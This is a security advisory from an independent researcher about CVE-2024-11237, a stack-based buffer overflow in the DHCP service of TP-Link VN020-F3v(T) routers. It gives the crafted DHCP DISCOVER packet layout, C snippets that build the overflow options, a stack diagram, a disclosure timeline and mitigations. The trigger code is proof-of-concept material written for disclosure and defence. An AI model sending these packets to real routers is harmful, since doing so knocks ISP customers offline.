A critical vulnerability has been discovered in TP-Link VN020 F3v(T) routers running firmware version TT_V6.2.1021. The vulnerability allows remote attackers to trigger a stack-based buffer overflow through specially crafted DHCP DISCOVER packets, leading to denial of service (DoS) conditions.
Affected Devices:
- Router Model: TP-Link VN020-F3v(T)
- Firmware Version: TT_V6.2.1021
- Deployment: Primarily through Tunisie Telecom and Topnet ISPs
- Confirmed Variants: Also affects Algerian and Moroccan versions
Important Note: Due to the proprietary nature of the firmware, the exact internal implementation details are unknown. This analysis is based on observed behavior and black-box testing.
- CVE ID: CVE-2024-11237
- Type: Stack-based Buffer Overflow (CWE-121)
- Attack Vector: Remote (DHCP DISCOVER Packet)
- Authentication: None Required
- Port: UDP/67 (DHCP Server)
- Impact: DoS (Confirmed) & RCE (Possible)
- Complexity: Low
[Basic DHCP Header]
0x00: 01 ; BOOTREQUEST
0x01: 01 ; Hardware type (Ethernet)
0x02: 06 ; Hardware address length
0x03: 00 ; Hops
0x04-0x07: XID ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC ; Client hardware address
0x29-0x2C: 0000 ; Padding
- DHCP Hostname Processing
// Overflow trigger through hostname option
unsigned char long_hostname[128];
memset(long_hostname, 'A', sizeof(long_hostname) - 1);
long_hostname[127] = '\0';
add_option(packet, offset, 0x0C, 127, long_hostname);- Vendor-Specific Option
// Vendor option manipulation
unsigned char vendor_specific[] = {
0x00, 0x14, 0x22, // TP-Link vendor prefix
0xFF, 0xFF, 0xFF // Trigger condition
};
add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific);- Length Field Manipulation
// Claimed vs actual length mismatch
add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 });While the exact internal implementation is unknown, the observed behavior suggests potential memory corruption issues:
Normal DHCP Hostname Processing
Stack Layout (Normal Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Return Address (4) |
+------------------------+
| Saved EBP (4) |
+------------------------+
| |
| Hostname Buffer |
| (64 bytes) |
| |
+------------------------+ Lower addresses
| Other Variables |
+------------------------+
What could potentially be happening inside the router?
Stack Layout (Overflow Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Overwritten Return |
+------------------------+
| Overwritten EBP | <- Unknown state corruption
+------------------------+
| Overflow Data | <- 127 bytes of 'A'
| ... |
+------------------------+ Lower addresses
| Other Variables | <- Potentially corrupted
+------------------------+
This is theoretical, and certain details may not be entirely accurate, as TP-Link provides the firmware for this router exclusively to ISPs.
POC.mp4
wireshark.mp4
Router may also try to restart it self as shown here due to the crash as shown here:
router_effect.mp4
- Immediate device unresponsiveness
- DHCP service failure
- Automatic router restart
- Network disruption requiring manual intervention
- Initial Discovery: October 20, 2024
- Vendor Notification: November 3, 2024
- CVE Assignment: November 15, 2024
No official patch is currently available. Temporary mitigations include:
- Disable DHCP server if not required
- Implement DHCP traffic filtering at network edge
- Consider alternative router models if possible
Mohamed Maatallah
- GitHub: @Zephkek
- Affiliation: Independent Security Researcher